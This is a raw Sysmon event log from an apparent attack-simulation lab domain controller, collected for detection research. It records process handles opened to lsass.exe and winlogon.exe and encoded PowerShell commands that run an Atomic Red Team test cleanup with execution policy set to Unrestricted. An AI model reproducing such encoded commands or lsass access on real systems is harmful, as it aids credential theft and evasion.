10341000x80000000000000005978Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005977Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005976Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005975Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005974Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.218{10ACEC4A-85A6-5FCF-F000-000000009101}48361104C:\Windows\system32\conhost.exe{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005973Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.218{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005972Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.218{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005971Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.218{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005970Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.218{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005969Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.218{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005968Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.218{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005967Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.218{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005966Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.218{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005965Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.218{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005964Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.218{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005963Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.218{10ACEC4A-85A6-5FCF-F300-000000009101}46364500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF8190092E0) 154100x80000000000000005962Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.224{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEMAbABlAGEAbgB1AHAAC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A6-5FCF-374B-090000000000}0x94b370HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000005961Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.999{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005960Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.999{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005959Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.999{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006628Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.717{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006627Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.717{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006626Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.717{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 